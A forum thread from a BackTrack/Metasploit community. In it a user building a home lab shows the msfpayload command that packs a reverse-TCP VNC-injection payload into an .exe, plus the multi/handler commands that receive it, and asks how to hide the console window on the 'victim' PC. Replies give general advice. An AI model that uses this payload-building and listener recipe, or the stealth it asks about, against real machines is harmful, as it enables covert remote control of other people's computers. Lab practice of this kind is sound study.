Results 1 to 5 of 5

Thread: Some Questions about msfpayload/Meterpreter

  1. #1
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    8

    Default Some Questions about msfpayload/Meterpreter

    Good evening, guys
    At first i want to say great thanks for the genius support in this forum.
    Friendly and professional answers aren't often.

    The last time i play a litte bit around with the combination of msfpayload and the vncinject payload.

    My envireoment :

    PC1: 192.168.0.2 ( XP or vista ) ( victim )
    PC2: 192.168.0.3 ( Backtrack.... sure )

    I create an exefile with ./msfpayload /windows/vncinject/reverse_tcp LHOST=192.168.0.3 LPORT=5500 R | -c 2 -t exe -o test.exe

    At backtrack ic start the handler :
    > use exploits/multi/halndler
    > set Payload /windows/vncinject/reverse_tcp
    > set LHOST 192.168.0.3
    > set LPORT 5500
    > exploit

    when the victim starts the exe, the vncdll will inject and at backtrack i get my fenster to watch.

    But now comes this bad blue cmdshell at the victim...
    Ich there any possibilitys to avoid this or catch the process and hide it ?
    Is there any other payload option i have to use to avoid this ?

    Another question is, if it is possible not to take the metasploit handler in backtrack to listen to the connection, but the relvncviewer or the Ultravncviewer in listen mode ?

    Big thanks to all who had an idea.

    Greetz
    Cyclone

  2. #2
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

    We now have like 20 threads going on meterpreter.....

  3. #3
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    8

    Default

    Hi Purehate

    I've written these post but i can'find an answer for the questions, examply if it is possible to use Ultravnc in listenmode. i've tried to realize this aber wenn the payload trys to connect to the ultraVNC(listen) nothing happen, insteat the the Listener is hang up. With the RealVNC listener only nothin happens.
    Perhaps i use the wrong payload parameters...

    I will try to use the searchfunction one more time, but the treats i'read doesent
    handle with this problem.

    Greetz
    Cyclone

  4. #4
    Member
    Join Date
    Dec 2007
    Location
    @InterN0T
    Posts
    315

    Default

    Make sure you understand how firewalls works/functions with bind_tcp and reverse_tcp. (keyword: dmz)

    Now a good advice after reading is to check it locally and then make sure it works.
    Don't install any Anti-virus on your local machine nor firewall. Just try it without and
    check how it works. It's really not that hard once you get to learn about it.

    There's plenty Metasploit and Meterpreter documentation and Docs on the internet, trust me
    [quote][I]I realized, that I had fallen down from the top of the mountain into a deep, terrifying and dark hole, just to find out that another mountain in front of me, much greater than the previous, was the next step in life. I began to wander uphill on the next mountain of life while I knew it would be much harder than the previous mountain. [/I]- MaXe[/quote]

  5. #5
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    What is a "bad blue cmdshell..." ?
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •